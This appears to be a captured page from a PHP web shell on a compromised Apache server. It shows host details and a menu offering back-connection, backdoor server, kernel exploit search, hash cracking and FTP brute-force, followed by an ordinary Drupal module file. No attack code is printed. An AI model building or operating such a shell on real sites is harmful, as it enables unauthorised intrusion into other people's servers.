|
System | : | Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686 |
Software | : | Apache. PHP/5.3.6-13ubuntu3.10 |
ID | : | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
|
|
Safe Mode | : | OFF |
Open_Basedir | : | OFF |
Freespace | : | 24.09 GB of 70.42 GB (34.2%) |
|
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON |
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
|
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ]
|
|
/
http/
guitar/
modules/
variable/
variable_store/
- drwxr-xr-x
|
Viewing file: variable_store.class.inc (1.07 KB) -rw-r--r--Select action/file-type:  ( +) |  ( +) |  ( +) | Code ( +) | Session ( +) |  ( +) | SDB ( +) |  ( +) |  ( +) |  ( +) |  ( +) |  ( +) |
<?php /** * @file * Variable realm controller */
class VariableStoreRealmStore extends VariableRealmDefaultStore { /** * Initialize realm. */ public function variable_init() { if (!isset($this->variables)) { $this->variables = &variable_store($this->realm, $this->key); } } /** * Set single variable. * * @param $name * Variable name * @param $value * Variable value */ public function variable_set($name, $value) { // Since $variables is a reference we just need to set the store value. variable_store_set($this->realm, $this->key, $name, $value); } /** * Delete single variable. * * @param $name * Variable name */ public function variable_del($name) { // Since $variables is a reference we just need to delete the store value. variable_store_del($this->realm, $this->key, $name); } /** * Implements 'magic' _sleep method. * * If serialized, variables should not be saved, but rebuilt from store on wake up. */ public function __sleep(){ return array('realm', 'key'); } }
|